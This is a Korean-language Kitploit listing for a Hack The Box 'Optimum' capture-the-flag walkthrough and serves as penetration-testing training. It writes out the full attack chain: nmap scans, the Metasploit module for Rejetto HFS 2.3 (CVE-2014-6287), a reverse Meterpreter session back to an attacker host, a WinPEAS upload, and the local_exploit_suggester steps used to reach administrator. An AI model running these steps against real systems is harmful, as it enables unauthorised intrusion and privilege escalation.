Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Optimum — Hack The Box의 Optimum 머신에 대한 분석. 이 워크스루는 Rejetto HttpFileServer 2.3(CVE-2014-6287)의 악용을 통해 초기 액세스를 얻은 다음, 열거 기술과 사후 악용 도구를 사용하여 Windows 호스트에서 권한 상승을 수행하는 방법을 다룹니다. | Kitploit
도구/GitHubGitHub/r3fr4kt/optimum
Privilege EscalationReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingLearning & Education
GitHub
96개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
r3fr4kt/optimum

Optimum

Hack The Box의 Optimum 머신에 대한 분석. 이 워크스루는 Rejetto HttpFileServer 2.3(CVE-2014-6287)의 악용을 통해 초기 액세스를 얻은 다음, 열거 기술과 사후 악용 도구를 사용하여 Windows 호스트에서 권한 상승을 수행하는 방법을 다룹니다.

저장소 보기

Optimum


Optimum – Hack The Box 라이트업

개요

이 머신의 목표는 취약한 웹 서비스를 악용하여 Windows 호스트에 대한 초기 접근을 획득한 다음, 권한을 상승시켜 관리자 플래그를 얻는 것입니다.

공격 경로는 다음과 같습니다:

  • 서비스 열거
  • Rejetto HTTP File Server 2.3 악용
  • Metasploit을 통한 초기 접근
  • WinPEAS 및 Metasploit 포스트 익스플로잇 모듈을 사용한 권한 상승

정찰

노출된 서비스를 식별하기 위해 전체 TCP 포트 스캔으로 시작합니다.

nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

스캔 결과 포트 80이 열려 있음을 확인합니다.

다음으로 서비스 및 버전 스캔을 수행합니다.

nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

결과는 다음 서비스를 식별합니다:

HttpFileServer 2.3

이 서비스는 경량 파일 공유 웹 서버인 Rejetto HTTP File Server에 해당합니다.


취약점 식별

감지된 버전을 조사한 후, 알려진 취약점을 발견합니다:

CVE-2014-6287

이 취약점은 부적절한 입력 검증으로 인해 원격 코드 실행을 허용합니다.


악용

취약점을 악용하기 위해 Metasploit을 사용합니다.

Metasploit을 시작합니다:

msfconsole -q

적절한 모듈을 검색합니다:

search rejetto

익스플로잇 모듈을 로드합니다:

use exploit/windows/http/rejetto_hfs_exec

필요한 옵션을 구성합니다:

set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

실행되면 익스플로잇은 대상 머신에서 Meterpreter 세션을 제공합니다.


초기 접근

획득한 Meterpreter 세션을 통해 파일 시스템을 탐색하여 사용자 플래그를 획득합니다.

cd
cat user.txt
whoami

명령 출력은 우리가 다음 사용자로 로그인되어 있음을 보여줍니다:

kostas

이 사용자는 관리자 권한이 없으므로 권한 상승을 진행합니다.


권한 상승 열거

잠재적인 권한 상승 벡터를 식별하기 위해 잘 알려진 Windows 권한 상승 열거 도구인 WinPEAS를 업로드합니다.

upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

그런 다음 실행합니다:

shell
.\wp.exe

출력은 사용자 kostas와 관련된 자격 증명을 포함한 유용한 정보를 보여줍니다.


권한 상승

가능한 상승 벡터를 검토한 후 Metasploit 모듈을 사용합니다:

local_exploit_suggester

모듈을 로드합니다:

use post/multi/recon/local_exploit_suggester

세션을 구성합니다:

set SESSION <SESSION_NUMBER>
run

이 모듈은 권한 상승에 사용할 수 있는 가능한 로컬 익스플로잇을 제안합니다.

권한 상승에 성공한 후 관리자 권한을 가진 셸을 획득합니다.

확인:

shell
whoami

관리자 접근

관리자 권한을 획득한 후 루트 플래그를 획득하기 위해 Administrator 디렉터리로 이동합니다.

cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

주요 교훈

이 머신은 몇 가지 중요한 침투 테스트 개념을 보여줍니다:

  • 취약한 소프트웨어를 식별하는 데 적절한 서비스 열거가 중요합니다.
  • CVE-2014-6287과 같은 공개적으로 알려진 취약점은 즉각적인 원격 코드 실행으로 이어질 수 있습니다.
  • WinPEAS와 같은 도구는 Windows 환경에서 권한 상승 기회를 식별하는 데 도움이 됩니다.
  • Metasploit 포스트 익스플로잇 모듈은 권한 상승 프로세스를 가속화할 수 있습니다.
도구 다운로드